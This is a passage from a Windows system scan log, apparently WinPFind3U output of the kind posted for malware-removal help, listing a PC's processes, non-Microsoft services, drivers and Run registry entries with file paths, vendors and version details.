vetmsg.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 201840 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
viewmgr.exe -> %ProgramFiles%\Viewpoint\Viewpoint Manager\ViewMgr.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 112336 bytes | Modified Date = 1/4/2007 4:38:20 PM | Attr = ]
viewpointservice.exe -> %ProgramFiles%\Viewpoint\Common\ViewpointService.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 24652 bytes | Modified Date = 1/4/2007 4:38:10 PM | Attr = ]
winpfind3u.exe -> %UserDesktop%\WinPFind3u\WinPFind3U.exe -> OldTimer Tools [Ver = 1.0.38.0 | Size = 318976 bytes | Modified Date = 5/22/2007 6:27:40 PM | Attr = ]
winvnc4.exe -> %ProgramFiles%\RealVNC\VNC4\winvnc4.exe -> RealVNC Ltd. [Ver = 4.1.1 | Size = 455632 bytes | Modified Date = 3/11/2005 2:40:26 PM | Attr = ]
wlservice.exe -> %ProgramFiles%\Wireless-G Portable USB Adapter\WLService.exe -> GEMTEKS [Ver = 1, 0, 0, 4 | Size = 41025 bytes | Modified Date = 2/6/2004 10:56:14 PM | Attr = ]
wusb54gp.exe -> %ProgramFiles%\Wireless-G Portable USB Adapter\WUSB54GP.exe -> Cisco Linksys Corporation [Ver = 1.0.2.5 | Size = 4314112 bytes | Modified Date = 2/9/2004 4:38:22 PM | Attr = ]

[Win32 Services - Non-Microsoft Only]
(AVG Anti-Spyware Guard) AVG Anti-Spyware Guard [Win32_Own | Auto | Running] -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\guard.exe -> GRISOFT s.r.o. [Ver = 7, 5, 1, 22 | Size = 312880 bytes | Modified Date = 5/30/2007 7:31:10 AM | Attr = ]
(CAISafe) CAISafe [Win32_Own | Auto | Running] -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\iSafe.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 259184 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(Creative Service for CDROM Access) Creative Service for CDROM Access [Win32_Own | Auto | Running] -> %System32%\CTsvcCDA.EXE -> Creative Technology Ltd [Ver = 1.0.1.0 | Size = 44032 bytes | Modified Date = 12/13/1999 2:01:00 AM | Attr = ]
(dmadmin) Logical Disk Manager Administrative Service [Win32_Shared | On_Demand | Stopped] -> %System32%\dmadmin.exe -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 224768 bytes | Modified Date = 8/4/2004 2:56:48 AM | Attr = ]
(IDriverT) InstallDriver Table Manager [Win32_Own | On_Demand | Stopped] -> %CommonProgramFiles%\InstallShield\Driver\11\Intel 32\IDriverT.exe -> Macrovision Corporation [Ver = 11.00.28844 | Size = 69632 bytes | Modified Date = 4/4/2005 1:41:10 AM | Attr = ]
(iPod Service) iPod Service [Win32_Own | On_Demand | Running] -> %ProgramFiles%\iPod\bin\iPodService.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 492608 bytes | Modified Date = 10/30/2006 10:36:32 AM | Attr = ]
(NetSvc) Intel NCS NetService [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\Intel\NCS\Sync\NetSvc.exe -> Intel® Corporation [Ver = 1.2.26.0 | Size = 143360 bytes | Modified Date = 3/3/2003 2:33:40 PM | Attr = ]
(NVSvc) NVIDIA Display Driver Service [Win32_Own | Auto | Stopped] -> %System32%\nvsvc32.exe -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 131139 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
(Pml Driver HPZ12) Pml Driver HPZ12 [Win32_Own | On_Demand | Running] -> %System32%\HPZipm12.exe -> HP [Ver = 6, 0, 0, 0 | Size = 65795 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(VETMSGNT) VET Message Service [Win32_Own | Auto | Running] -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 201840 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(Viewpoint Manager Service) Viewpoint Manager Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Viewpoint\Common\ViewpointService.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 24652 bytes | Modified Date = 1/4/2007 4:38:10 PM | Attr = ]
(WinVNC4) VNC Server Version 4 [Win32_Own | Auto | Running] -> %ProgramFiles%\RealVNC\VNC4\winvnc4.exe -> RealVNC Ltd. [Ver = 4.1.1 | Size = 455632 bytes | Modified Date = 3/11/2005 2:40:26 PM | Attr = ]
(WUSB54GPSVC) WUSB54GPSVC [Win32_Own | Auto | Running] -> %ProgramFiles%\Wireless-G Portable USB Adapter\WLService.exe -> GEMTEKS [Ver = 1, 0, 0, 4 | Size = 41025 bytes | Modified Date = 2/6/2004 10:56:14 PM | Attr = ]

[Driver Services - Non-Microsoft Only]
(a347bus) a347bus [Kernel | Boot | Running] -> %System32%\DRIVERS\a347bus.sys -> [Ver = 3.47.0.0 built by: WinDDK | Size = 160640 bytes | Modified Date = 4/30/2004 9:37:02 AM | Attr = ]
(a347scsi) a347scsi [Kernel | Boot | Running] -> %System32%\DRIVERS\a347scsi.sys -> [Ver = 3.47.0.0 built by: WinDDK | Size = 5248 bytes | Modified Date = 4/30/2004 9:33:00 AM | Attr = ]
(Abiosdsk) Abiosdsk [Kernel | Disabled | Stopped] -> -> File not found
(AFS2K) AFS2K [Kernel | System | Running] -> %System32%\drivers\AFS2K.SYS -> Oak Technology Inc. [Ver = 3.1.21.1103 | Size = 35840 bytes | Modified Date = 10/7/2004 8:16:04 PM | Attr = ]
(AliIde) AliIde [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ALIIDE.SYS -> Acer Laboratories Inc. [Ver = 1.20 | Size = 5248 bytes | Modified Date = 8/17/2001 2:51:56 PM | Attr = ]
(amdagp) AMD AGP Bus Filter Driver [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\amdagp.sys -> Advanced Micro Devices, Inc. [Ver = 5.00 (xpsp_sp2_rtm.040803-2158) | Size = 43008 bytes | Modified Date = 8/4/2004 1:07:42 AM | Attr = ]
(asc) asc [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ASC.SYS -> Advanced System Products, Inc. [Ver = 2.9I-MS (XPClient.010817-1148) | Size = 26496 bytes | Modified Date = 8/17/2001 2:52:00 PM | Attr = ]
(asc3550) asc3550 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ASC3550.SYS -> Advanced System Products, Inc. [Ver = 3.1E-MS (XPClient.010817-1148) | Size = 14848 bytes | Modified Date = 8/17/2001 2:51:58 PM | Attr = ]
(atapi) Standard IDE/ESDI Hard Disk Controller [Kernel | Boot | Running] -> %System32%\DRIVERS\atapi.sys -> [Ver = | Size = 87296 bytes | Modified Date = 4/23/2003 10:29:54 AM | Attr = ]
(Atdisk) Atdisk [Kernel | Disabled | Stopped] -> -> File not found
(AVG Anti-Spyware Driver) AVG Anti-Spyware Driver [Kernel | System | Running] -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\guard.sys -> [Ver = | Size = 11000 bytes | Modified Date = 5/30/2007 7:10:42 AM | Attr = ]
(AvgAsCln) AVG Anti-Spyware Clean Driver [Kernel | System | Running] -> %System32%\DRIVERS\AvgAsCln.sys -> GRISOFT, s.r.o. [Ver = 1.0.0.14 | Size = 10872 bytes | Modified Date = 5/30/2007 7:10:42 AM | Attr = ]
(bvrp_pci) bvrp_pci [Kernel | On_Demand | Stopped] -> -> File not found
(Changer) Changer [Kernel | System | Stopped] -> -> File not found
(CmdIde) CmdIde [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\CMDIDE.SYS -> CMD Technology, Inc. [Ver = 2.0.7 (XPClient.010817-1148) | Size = 6656 bytes | Modified Date = 8/17/2001 2:51:54 PM | Attr = ]
(dac2w2k) dac2w2k [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\DAC2W2K.SYS -> Mylex Corporation [Ver = 6.00-21 (XPClient.010817-1148) | Size = 179584 bytes | Modified Date = 8/17/2001 2:52:16 PM | Attr = ]
(dmboot) dmboot [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\dmboot.sys -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 799744 bytes | Modified Date = 8/4/2004 1:07:18 AM | Attr = ]
(dmio) dmio [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\dmio.sys -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 153344 bytes | Modified Date = 8/4/2004 1:07:16 AM | Attr = ]
(dmload) dmload [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\DMLOAD.SYS -> Microsoft Corp., Veritas Software. [Ver = 2600.0.503.0 | Size = 5888 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(drvmcdb) drvmcdb [Kernel | Boot | Running] -> %System32%\DRIVERS\drvmcdb.sys -> Sonic Solutions [Ver = 3.21.65a | Size = 84576 bytes | Modified Date = 7/31/2003 4:21:00 AM | Attr = ]
(drvnddm) drvnddm [File_System | Auto | Running] -> %System32%\DRIVERS\drvnddm.sys -> Sonic Solutions [Ver = 2.56.38a | Size = 40448 bytes | Modified Date = 6/20/2003 3:56:00 AM | Attr = ]
(E100B) Intel® PRO Adapter Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\e100b325.sys -> Intel Corporation [Ver = 7.0.26.0 built by: WinDDK | Size = 145408 bytes | Modified Date = 3/4/2003 1:56:26 PM | Attr = ]
(EL90XBC) 3Com EtherLink XL 90XB/C Adapter Driver [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\EL90XBC5.SYS -> 3Com Corporation [Ver = 4.05.00.0000 | Size = 66591 bytes | Modified Date = 8/17/2001 1:11:06 PM | Attr = ]
(ENTECH) ENTECH [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\Entech.sys -> EnTech Taiwan [Ver = 1.0 | Size = 20400 bytes | Modified Date = 10/21/1999 12:12:52 PM | Attr = ]
(GEARAspiWDM) GEARAspiWDM [Kernel | On_Demand | Running] -> %System32%\DRIVERS\GEARAspiWDM.sys -> GEAR Software Inc. [Ver = 2.0.6.1 | Size = 15664 bytes | Modified Date = 9/19/2006 4:44:04 PM | Attr = ]
(GTNDIS5) GTNDIS5 NDIS Protocol Driver [Kernel | On_Demand | Running] -> %System32%\GTNDIS5.sys -> Printing Communications Assoc., Inc. (PCAUSA) [Ver = 5.03.16.54 | Size = 15872 bytes | Modified Date = 9/25/2003 10:15:32 PM | Attr = ]
(HPZid412) IEEE-1284.4 Driver HPZid412 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\hpzid412.sys -> HP [Ver = 6, 0, 0, 0 | Size = 51024 bytes | Modified Date = 3/9/2003 3:31:00 PM | Attr = ]
(HPZipr12) Print Class Driver for IEEE-1284.4 HPZipr12 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\HPZipr12.sys -> HP [Ver = 6, 0, 0, 0 | Size = 16080 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(HPZius12) USB to IEEE-1284.4 Translation Driver HPZius12 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\HPZius12.sys -> HP [Ver = 6, 0, 0, 0 | Size = 21456 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(i81x) i81x [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\i81xnt5.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 161020 bytes | Modified Date = 8/4/2004 12:29:36 AM | Attr = ]
(iAimFP0) iAimFP0 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv01nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12415 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP1) iAimFP1 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv02nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12127 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP2) iAimFP2 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv05nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 11775 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP3) iAimFP3 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wsiintxx.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12063 bytes | Modified Date = 8/4/2004 12:29:48 AM | Attr = ]
(iAimFP4) iAimFP4 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wvchntxx.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 19455 bytes | Modified Date = 8/4/2004 12:29:50 AM | Attr = ]
(iAimTV0) iAimTV0 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv01nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 29311 bytes | Modified Date = 8/4/2004 12:29:42 AM | Attr = ]
(iAimTV1) iAimTV1 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv02nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 19551 bytes | Modified Date = 8/4/2004 12:29:42 AM | Attr = ]
(iAimTV2) iAimTV2 [Kernel | On_Demand | Stopped] -> System32\DRIVERS\wATV03nt.sys -> File not found
(iAimTV3) iAimTV3 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv04nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 33599 bytes | Modified Date = 8/4/2004 12:29:44 AM | Attr = ]
(iAimTV4) iAimTV4 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wch7xxnt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 23615 bytes | Modified Date = 8/4/2004 12:29:46 AM | Attr = ]
(IntelC51) IntelC51 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC51.sys -> Intel Corporation [Ver = 2.15.25.0 | Size = 1232741 bytes | Modified Date = 11/20/2003 11:13:40 PM | Attr = ]
(IntelC52) IntelC52 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC52.sys -> Intel Corporation [Ver = 4.58.1 | Size = 646825 bytes | Modified Date = 11/20/2003 11:14:28 PM | Attr = ]
(IntelC53) IntelC53 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC53.sys -> Intel Corporation [Ver = 2.15.25.0 | Size = 59717 bytes | Modified Date = 11/20/2003 11:12:56 PM | Attr = ]
(lbrtfdc) lbrtfdc [Kernel | System | Stopped] -> -> File not found
(LVUSBSta) Logitech USB Monitor Filter [Kernel | On_Demand | Running] -> %System32%\DRIVERS\LVUSBSta.sys -> Logitech Inc. [Ver = 8.4.6.1016 | Size = 22016 bytes | Modified Date = 1/31/2005 10:12:48 AM | Attr = ]
(mohfilt) mohfilt [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\mohfilt.sys -> Intel Corporation [Ver = 7.11.0.0 | Size = 37048 bytes | Modified Date = 11/20/2003 11:12:42 PM | Attr = ]
(mraid35x) mraid35x [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\MRAID35X.SYS -> American Megatrends Inc. [Ver = 6.19 (XPClient.010817-1148) | Size = 17280 bytes | Modified Date = 8/17/2001 2:52:12 PM | Attr = ]
(MxlW2k) MxlW2k [Kernel | On_Demand | Running] -> %System32%\drivers\MxlW2k.sys -> MusicMatch, Inc. [Ver = 1.1.0.116 | Size = 28256 bytes | Modified Date = 12/18/2004 6:56:24 PM | Attr = ]
(nv) nv [Kernel | On_Demand | Running] -> %System32%\DRIVERS\nv4_mini.sys -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 3530432 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
(omci) OMCI WDM Device Driver [Kernel | System | Running] -> %System32%\DRIVERS\omci.sys -> Dell Computer Corporation [Ver = 7, 0, 323, 0 | Size = 17217 bytes | Modified Date = 11/8/2002 2:45:06 PM | Attr = ]
(P16X) Creative SB Live! Series (WDM) [Kernel | On_Demand | Running] -> %System32%\DRIVERS\P16X.sys -> Creative Technology Ltd. [Ver = 5.12.01.129 | Size = 1296384 bytes | Modified Date = 8/14/2003 11:58:12 AM | Attr = ]
(PCIDump) PCIDump [Kernel | System | Stopped] -> -> File not found
(PDCOMP) PDCOMP [Kernel | On_Demand | Stopped] -> -> File not found
(PDFRAME) PDFRAME [Kernel | On_Demand | Stopped] -> -> File not found
(PDRELI) PDRELI [Kernel | On_Demand | Stopped] -> -> File not found
(PDRFRAME) PDRFRAME [Kernel | On_Demand | Stopped] -> -> File not found
(pfc) Padus ASPI Shell [Kernel | On_Demand | Running] -> %System32%\DRIVERS\pfc.sys -> Padus, Inc. [Ver = 2, 5, 0, 200 | Size = 14604 bytes | Modified Date = 8/11/2003 10:07:46 AM | Attr = ]
(PfModNT) PfModNT [Kernel | Auto | Running] -> %System32%\PFMODNT.SYS -> Creative Technology Ltd. [Ver = 2.0.0.0 | Size = 6752 bytes | Modified Date = 12/17/1999 2:00:00 AM | Attr = ]
(PQNTDrv) PQNTDrv [Kernel | System | Running] -> %System32%\drivers\PQNTDRV.sys -> PowerQuest Corporation [Ver = 8.00.000 | Size = 4228 bytes | Modified Date = 4/16/2003 2:21:30 PM | Attr = ]
(PRISM_A02) 802.11a/g USB Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\WUSB20XP.sys -> Cisco-Linksys, LLC. [Ver = 1.0.8 | Size = 339488 bytes | Modified Date = 1/7/2004 5:04:00 PM | Attr = ]
(Ptilink) Direct Parallel Link Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\PTILINK.SYS -> Parallel Technologies, Inc. [Ver = 1.10 (XPClient.010817-1148) | Size = 17792 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(PxHelp20) PxHelp20 [Kernel | Boot | Running] -> %System32%\DRIVERS\pxhelp20.sys -> Sonic Solutions [Ver = 2.02.57a | Size = 17168 bytes | Modified Date = 7/30/2003 3:02:00 AM | Attr = ]
(QCMerced) Logitech QuickCam Communicate [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\lvcm.sys -> [Ver = | Size = 585824 bytes | Modified Date = 10/8/2004 10:58:34 AM | Attr = ]
(ql1080) ql1080 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL1080.SYS -> QLogic Corporation [Ver = 3.04 | Size = 40320 bytes | Modified Date = 8/17/2001 2:52:20 PM | Attr = ]
(ql12160) ql12160 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL12160.SYS -> QLogic Corporation [Ver = 7.13.02 (W64) | Size = 45312 bytes | Modified Date = 8/17/2001 2:52:20 PM | Attr = ]
(ql1280) ql1280 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL1280.SYS -> QLogic Corporation [Ver = 7.13.01 (W2K) | Size = 49024 bytes | Modified Date = 8/17/2001 2:52:18 PM | Attr = ]
(Secdrv) Secdrv [Kernel | Auto | Running] -> %System32%\DRIVERS\secdrv.sys -> [Ver = | Size = 27440 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(Simbad) Simbad [Kernel | Disabled | Stopped] -> -> File not found
(sisagp) SIS AGP Bus Filter [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\sisagp.sys -> Silicon Integrated Systems Corporation [Ver = 5.12.01.2010 (xpsp_sp2_rtm.040803-2158) | Size = 41088 bytes | Modified Date = 8/4/2004 1:07:42 AM | Attr = ]
(SoP1kUSB) Sony PEG Virtual Port [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\SoP1kUSB.sys -> Sony Corporation [Ver = 1.00.0006070 | Size = 29440 bytes | Modified Date = 10/9/2001 4:39:32 PM | Attr = ]
(Sparrow) Sparrow [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SPARROW.SYS -> Adaptec, Inc. [Ver = v2.0a (ReleaseBinaries.001205-1804) | Size = 19072 bytes | Modified Date = 8/17/2001 3:07:44 PM | Attr = ]
(sscdbhk5) sscdbhk5 [File_System | System | Running] -> %System32%\DRIVERS\sscdbhk5.sys -> Sonic Solutions [Ver = 1.10.81a | Size = 5621 bytes | Modified Date = 7/14/2003 12:28:40 PM | Attr = ]
(ssrtln) ssrtln [File_System | System | Running] -> %System32%\DRIVERS\ssrtln.sys -> Sonic Solutions [Ver = 1.10.81a | Size = 23219 bytes | Modified Date = 7/14/2003 12:28:22 PM | Attr = ]
(symc810) symc810 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYMC810.SYS -> Symbios Logic Inc. [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 16256 bytes | Modified Date = 8/17/2001 3:07:34 PM | Attr = ]
(symc8xx) symc8xx [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYMC8XX.SYS -> LSI Logic [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 32640 bytes | Modified Date = 8/17/2001 3:07:36 PM | Attr = ]
(sym_hi) sym_hi [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYM_HI.SYS -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 28384 bytes | Modified Date = 8/17/2001 3:07:40 PM | Attr = ]
(sym_u3) sym_u3 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYM_U3.SYS -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 30688 bytes | Modified Date = 8/17/2001 3:07:42 PM | Attr = ]
(tfsnboio) tfsnboio [File_System | Auto | Running] -> %System32%\dla\tfsnboio.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 25685 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsncofs) tfsncofs [File_System | Auto | Running] -> %System32%\dla\tfsncofs.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 34837 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsndrct) tfsndrct [File_System | Auto | Running] -> %System32%\dla\tfsndrct.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 4117 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsndres) tfsndres [File_System | Auto | Running] -> %System32%\dla\tfsndres.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 2233 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnifs) tfsnifs [File_System | Auto | Running] -> %System32%\dla\tfsnifs.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 83284 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnopio) tfsnopio [File_System | Auto | Running] -> %System32%\dla\tfsnopio.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 14229 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnpool) tfsnpool [File_System | Auto | Running] -> %System32%\dla\tfsnpool.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 6357 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnudf) tfsnudf [File_System | Auto | Running] -> %System32%\dla\tfsnudf.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 98068 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnudfa) tfsnudfa [File_System | Auto | Running] -> %System32%\dla\tfsnudfa.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 100373 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(ultra) ultra [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ULTRA.SYS -> Promise Technology, Inc. [Ver = 1.43 (Build 0603) | Size = 36736 bytes | Modified Date = 8/17/2001 2:52:22 PM | Attr = ]
(VET-FILT) VET File System Filter [Kernel | System | Running] -> %System32%\drivers\Vet-Filt.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 21031 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VET-REC) VET File System Recognizer [Kernel | System | Running] -> %System32%\drivers\Vet-Rec.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 15478 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VETEBOOT) VET Boot Scan Engine [Kernel | On_Demand | Running] -> %System32%\drivers\VetEBoot.sys -> Computer Associates International, Inc. [Ver = 30.8.0.0 | Size = 108624 bytes | Modified Date = 6/20/2007 5:25:08 PM | Attr = ]
(VETEFILE) VET File Scan Engine [Kernel | System | Running] -> %System32%\drivers\VetEFile.sys -> Computer Associates International, Inc. [Ver = 30.8.0.0 | Size = 630432 bytes | Modified Date = 6/20/2007 5:25:08 PM | Attr = ]
(VETFDDNT) VET Floppy Boot Sector Monitor [Kernel | System | Running] -> %System32%\drivers\VetFDDNT.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 15735 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VETMONNT) VET File Monitor [Kernel | System | Running] -> %System32%\drivers\vetmonnt.sys -> Computer Associates International, Inc. [Ver = 7.2.0.0 | Size = 26787 bytes | Modified Date = 7/31/2006 12:56:06 PM | Attr = ]
(W8100PCI) D-Link AirPlus G Wireless Driver [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\MRV8K51.sys -> Marvell Semiconductor, Inc [Ver = 2.03.00.000 built by: WinDDK | Size = 297984 bytes | Modified Date = 1/8/2004 10:46:18 PM | Attr = R ]
(wanatw) WAN Miniport (ATW) [Kernel | On_Demand | Stopped] -> System32\DRIVERS\wanatw4.sys -> File not found
(WDICA) WDICA [Kernel | On_Demand | Stopped] -> -> File not found

[Registry - Non-Microsoft Only]
< Run [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
!AVG Anti-Spyware -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\avgas.exe -> GRISOFT s.r.o. [Ver = 7, 5, 1, 43 | Size = 6731312 bytes | Modified Date = 6/11/2007 4:25:42 AM | Attr = ]
CaAvTray -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 230512 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
CAVRID -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRid.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 185456 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
diagent -> %ProgramFiles%\Creative\SBLive\Diagnostics\diagent.exe -> Creative Technology Ltd [Ver = 1, 1, 4, 0 | Size = 135264 bytes | Modified Date = 4/3/2002 2:01:00 AM | Attr = ]
DwlClient -> %CommonProgramFiles%\Dell\EUSW\Support.exe -> Dell [Ver = 2, 1, 1, 0 | Size = 323584 bytes | Modified Date = 5/27/2004 9:05:42 PM | Attr = ]
iTunesHelper -> %ProgramFiles%\iTunes\iTunesHelper.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 256576 bytes | Modified Date = 10/30/2006 10:36:36 AM | Attr = ]
LogitechVideoRepair -> %ProgramFiles%\Logitech\Video\ISStart.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 458752 bytes | Modified Date = 1/18/2005 5:47:30 PM | Attr = ]
LogitechVideoTray -> %ProgramFiles%\Logitech\Video\LogiTray.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 217088 bytes | Modified Date = 1/18/2005 5:37:30 PM | Attr = ]
NeroFilterCheck -> %System32%\NeroCheck.exe -> Ahead Software Gmbh [Ver = 1, 0, 0, 2 | Size = 155648 bytes | Modified Date = 7/9/2001 10:50:42 AM | Attr = ]
NvCplDaemon -> %System32%\nvcpl.dll [RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup] -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 7286784 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
NvMediaCenter -> %System32%\nvmctray.dll [RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit] -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 86016 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
QuickTime Task -> %ProgramFiles%\QuickTime\qttask.exe -> Apple Computer, Inc. [Ver = 7.1.3 | Size = 282624 bytes | Modified Date = 10/25/2006 7:58:18 PM | Attr = ]
SunJavaUpdateSched -> %ProgramFiles%\Java\jre1.6.0_01\bin\jusched.exe -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 83608 bytes | Modified Date = 3/14/2007 3:43:44 AM | Attr = ]
TkBellExe -> %CommonProgramFiles%\Real\Update_OB\realsched.exe -> RealNetworks, Inc. [Ver = 0.1.0.1622 | Size = 151597 bytes | Modified Date = 3/26/2004 4:10:10 PM | Attr = ]
< OptionalComponents [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\
IMAIL -> Installed = 1 ->
MAPI -> Installed = 1 ->
MSFS -> Installed = 1 ->
< Run [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
